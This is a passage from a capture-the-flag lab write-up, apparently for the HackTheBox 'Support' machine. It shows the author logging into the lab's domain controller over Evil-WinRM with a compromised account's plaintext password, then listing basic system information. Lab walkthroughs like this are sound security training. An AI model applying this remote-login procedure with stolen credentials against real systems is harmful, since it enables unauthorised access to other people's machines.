WinRM
Now that I have compromised a valid domain account that is part of the Remote Management Users group, I will be able to establish a WinRM session to the target system
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ evil-winrm -i dc.support.htb -u support -p Ironside47pleasure40Watchful
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\support\Documents> whoami
support\support
*evil-winrm* ps c:\Users\support\Documents> hostname
dc
*evil-winrm* ps c:\Users\support\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.11.174
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : 10.10.10.2Initial Foothold established to the target system as the support account via evil-winrm